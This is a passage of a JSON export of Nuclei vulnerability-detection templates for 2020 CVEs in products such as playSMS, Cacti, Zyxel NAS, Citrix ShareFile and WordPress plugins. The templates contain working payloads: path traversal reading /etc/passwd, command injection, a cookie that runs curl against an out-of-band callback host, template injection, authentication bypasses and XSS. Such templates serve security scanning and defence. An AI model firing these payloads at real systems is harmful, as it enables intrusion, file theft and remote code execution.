action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950", "hash": "391392127f66b121fd1bfbc3f7ac2dc8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308244" }, "name": "CVE-2020-8641.yaml", "content": "id: CVE-2020-8641\n\ninfo:\n name: Lotus Core CMS 1.0.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2020010234\n - https://www.exploit-db.com/exploits/47985\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8641\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8641\n cwe-id: CWE-22\n epss-score: 0.0071\n epss-percentile: 0.80028\n cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lotus_core_cms_project\n product: lotus_core_cms\n tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1ececd05341a5a1bef5c9da1c0dfda7428c31f46f8abe790aa333141dc7004e022100c929cd89b883f1951676f34e2109adfac476702f5883f91216e42df3df792754:922c64590222798bb761d5b6d8e72950", "hash": "b17a407355ec5bb70046886b570728cc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308245" }, "name": "CVE-2020-8644.yaml", "content": "id: CVE-2020-8644\n\ninfo:\n name: playSMS <1.4.3 - Remote Code Execution\n author: dbrwsky\n severity: critical\n description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/\n - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8644\n - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html\n - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8644\n cwe-id: CWE-94\n epss-score: 0.96028\n epss-percentile: 0.99356\n cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: playsms\n product: playsms\n tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce\n\nhttp:\n - raw:\n - |\n GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '4468-0202-EVC'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: xpath\n name: csrf\n internal: true\n xpath:\n - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input\n attribute: value\n part: body\n# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950", "hash": "8b59f3d7256132f7f9fc824bb425d301", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308246" }, "name": "CVE-2020-8654.yaml", "content": "id: CVE-2020-8654\n\ninfo:\n name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution\n author: praetorian-thendrickson\n severity: high\n description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.\n impact: |\n Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system.\n remediation: |\n Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities.\n reference:\n - https://github.com/h4knet/eonrce\n - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb\n - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8654\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8654\n cwe-id: CWE-78\n epss-score: 0.04987\n epss-percentile: 0.92656\n cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eyesofnetwork\n product: eyesofnetwork\n tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/css/eonweb.css\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 5.4', '>= 5.1')\n\n - type: word\n part: body\n words:\n - \"EyesOfNetwork\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"# VERSION : ([0-9.]+)\"\n internal: true\n part: body\n# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950", "hash": "11adae59c2d814b1fc7377410596795f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308247" }, "name": "CVE-2020-8771.yaml", "content": "id: CVE-2020-8771\n\ninfo:\n name: WordPress Time Capsule < 1.21.16 - Authentication Bypass\n author: princechaddha\n severity: critical\n description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin.\n remediation: |\n Update WordPress Time Capsule plugin to version 1.21.16 or later.\n reference:\n - https://github.com/SECFORCE/WPTimeCapsulePOC\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8771\n - https://wpvulndb.com/vulnerabilities/10010\n - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8771\n cwe-id: CWE-287\n epss-score: 0.07621\n epss-percentile: 0.93504\n cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wptimecapsule\n product: wp_time_capsule\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wptimecapsule\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n Accept: */*\n\n IWP_JSON_PREFIX\n - |\n GET /wp-admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '
    '\n - \"

    Dashboard

    \"\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"wordpress_[a-z0-9]+=([A-Za-z0-9%]+)\"\n part: header\n# digest: 490a0046304402204b41fb153964f98c107c172d7a2c74f48970b835829d159402ad436a5e80db8b02203cc1966c1359d4d12a32c63ed49512b83bd1529496236446f0e2ddcaa41eb7d2:922c64590222798bb761d5b6d8e72950", "hash": "9ded79c19c2654f86fabe0e807d356db", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308248" }, "name": "CVE-2020-8772.yaml", "content": "id: CVE-2020-8772\n\ninfo:\n name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass\n author: princechaddha,scent2d\n severity: critical\n description: |\n WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can gain unauthorized administrative access to the WordPress site.\n remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.\n reference:\n - https://wpscan.com/vulnerability/10011\n - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/\n - https://wpvulndb.com/vulnerabilities/10011\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8772\n - https://github.com/ChoiSG/vwp\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8772\n cwe-id: CWE-862\n epss-score: 0.96607\n epss-percentile: 0.99546\n cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: revmakx\n product: infinitewp_client\n framework: wordpress\n tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx\n\nhttp:\n - raw:\n - |\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Accept-Language: en-US,en;q=0.9\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n _IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"wordpress_logged_in\"\n\n - type: word\n part: body\n words:\n - \"\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n\n - type: regex\n name: username\n group: 1\n regex:\n - 'ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/'\n internal: true\n part: header\n# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950", "hash": "0100d718eafe304863c523a7cec2e29b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308249" }, "name": "CVE-2020-8813.yaml", "content": "id: CVE-2020-8813\n\ninfo:\n name: Cacti v1.2.8 - Remote Code Execution\n author: gy741\n severity: high\n description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if \"Guest Realtime Graphs\" privileges are enabled.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.\n reference:\n - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/\n - https://github.com/Cacti/cacti/releases\n - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129\n - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8813\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8813\n cwe-id: CWE-78\n epss-score: 0.95033\n epss-percentile: 0.9913\n cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cacti\n product: cacti\n tags: cve2020,cve,cacti,rce,oast\n\nhttp:\n - raw:\n - |\n GET /graph_realtime.php?action=init HTTP/1.1\n Host: {{Hostname}}\n Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a0047304502204ec01dfe89f1f9796f53b43c3f8f9bfff0db4ea3e3eb7da3df8e6f4a15c93004022100a3827d38bc0be92d24eef29752497f720909d1d144850428accdd33dc2a798e8:922c64590222798bb761d5b6d8e72950", "hash": "0be36e513a193b58ace2b5c32beb7c07", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824a" }, "name": "CVE-2020-8982.yaml", "content": "id: CVE-2020-8982\n\ninfo:\n name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read\n author: dwisiswant0\n severity: high\n description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.\n impact: |\n An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information.\n remediation: |\n Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability.\n reference:\n - https://support.citrix.com/article/CTX269106\n - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view\n - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8982\n - https://github.com/0xT11/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-8982\n cwe-id: CWE-22\n epss-score: 0.76583\n epss-percentile: 0.98117\n cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: sharefile_storagezones_controller\n tags: cve2020,cve,citrix,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/XmlPeek.aspx?dt=\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\win.ini&x=/validate.ashx?requri\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204412ce229c5877288e6faa77220767561a5fca4b8ab2566f23e2d7102706e67b02200cc521198e9c54a98f3bbaaba12c87827328af30704210e8eb388a6a2df98f2a:922c64590222798bb761d5b6d8e72950", "hash": "47f6ef4f313d669eab423bff3384684b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824b" }, "name": "CVE-2020-9036.yaml", "content": "id: CVE-2020-9036\n\ninfo:\n name: Jeedom <=4.0.38 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.\n reference:\n - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9036\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/my3ker/my3ker-cve-workshop\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-9036\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jeedom\n product: jeedom\n tags: cve,cve2020,xss,jeedom\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2b80e81f9efe58be8ec0d3d891a2338f141a0fe35e0a84de0e7223200f8fdb3022100fa273979e8c86cdf5acb48a0e6efd5b42d10962dcd2b82e270dd8ca259d39c79:922c64590222798bb761d5b6d8e72950", "hash": "723004824e24637193781a8faa34c94b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824c" }, "name": "CVE-2020-9043.yaml", "content": "id: CVE-2020-9043\n\ninfo:\n name: WordPress wpCentral <1.5.1 - Information Disclosure\n author: scent2d\n severity: high\n description: |\n WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin.\n remediation: |\n Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/10074\n - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043\n - https://wordpress.org/plugins/wp-central/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9043\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-9043\n cwe-id: CWE-200\n epss-score: 0.04173\n epss-percentile: 0.91333\n cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wpcentral\n product: wpcentral\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_4, 'text/html')\"\n - \"status_code_4 == 200\"\n - \"contains(body_4, 'wpCentral Connection Key')\"\n - contains(body_4, \"pagenow = \\'dashboard\\'\")\n condition: and\n\n extractors:\n - type: regex\n name: authkey\n group: 1\n regex:\n - 'style=\"word-wrap:break-word;\">([a-z0-9]+)'\n internal: true\n part: body\n\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)'\n internal: true\n part: body\n# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950", "hash": "6c589cc7aaed280d3586ea72cde26196", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824d" }, "name": "CVE-2020-9047.yaml", "content": "id: CVE-2020-9047\n\ninfo:\n name: exacqVision Web Service - Remote Code Execution\n author: dwisiswant0\n severity: high\n description: |\n exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the vulnerability.\n reference:\n - https://github.com/norrismw/CVE-2020-9047\n - https://www.johnsoncontrols.com/cyber-solutions/security-advisories\n - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9047\n - https://github.com/hectorgie/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-9047\n cwe-id: CWE-347\n epss-score: 0.00782\n epss-percentile: 0.81009\n cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: johnsoncontrols\n product: exacqvision_enterprise_manager\n tags: cve,cve2020,rce,exacqvision,johnsoncontrols\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/version.web\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"3.10.4.72058\"\n - \"3.12.4.76544\"\n - \"3.8.2.67295\"\n - \"7.0.2.81005\"\n - \"7.2.7.86974\"\n - \"7.4.3.89785\"\n - \"7.6.4.94391\"\n - \"7.8.2.97826\"\n - \"8.0.6.105408\"\n - \"8.2.2.107285\"\n - \"8.4.3.111614\"\n - \"8.6.3.116175\"\n - \"8.8.1.118913\"\n - \"9.0.3.124620\"\n - \"9.2.0.127940\"\n - \"9.4.3.137684\"\n - \"9.6.7.145949\"\n - \"9.8.4.149166\"\n - \"19.03.3.152166\"\n - \"19.06.4.157118\"\n - \"19.09.4.0\"\n - \"19.12.2.0\"\n - \"20.03.2.0\"\n - \"20.06.3.0\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201bb09c86a03cdad4b55f9720c8a87b38362c69ac91148afe70b9d98329a7f06902200a275aacb80cb3b7fe0f4364359d9de1b96dd30f7f64ae230e7d81cf79aa25a6:922c64590222798bb761d5b6d8e72950", "hash": "c8b219f4b3b2e855d9797b5646e667d8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824e" }, "name": "CVE-2020-9054.yaml", "content": "id: CVE-2020-9054\n\ninfo:\n name: Zyxel NAS Firmware 5.21- Remote Code Execution\n author: dhiyaneshDk\n severity: critical\n description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.'\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by Zyxel to mitigate this vulnerability.\n reference:\n - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/\n - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9054\n - https://kb.cert.org/vuls/id/498544/\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-9054\n cwe-id: CWE-78\n epss-score: 0.96978\n epss-percentile: 0.99679\n cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: nas326_firmware\n tags: cve2020,cve,rce,zyxel,injection,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200f3db795bac6a39f0ab95221db22133a21ee123eaf7b2cbb5cc7a9ea0430fdaf022053244d01dda45456c1650e9b3d1268931b4378212caa405aef51a2348bb5b9c3:922c64590222798bb761d5b6d8e72950", "hash": "06d1725a977377ec395132ff7576bbfb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30824f" }, "name": "CVE-2020-9315.yaml", "content": "id: CVE-2020-9315\n\ninfo:\n name: Oracle iPlanet Web Server 7.0.x - Authentication Bypass\n author: dhiyaneshDk\n severity: high\n description: |\n Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://www.cvebase.com/cve/2020/9315\n - https://www.oracle.com/support/lifetime-support/\n - https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf\n - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-9315\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-9315\n cwe-id: CWE-306\n epss-score: 0.97337\n epss-percentile: 0.9988\n cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: iplanet_web_server\n tags: cve,cve2020,oracle,auth-bypass,iplanet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2\"\n - \"{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Admin Console\"\n\n - type: word\n words:\n - \"serverConfigurationsGeneral\"\n - \"serverCertificatesGeneral\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 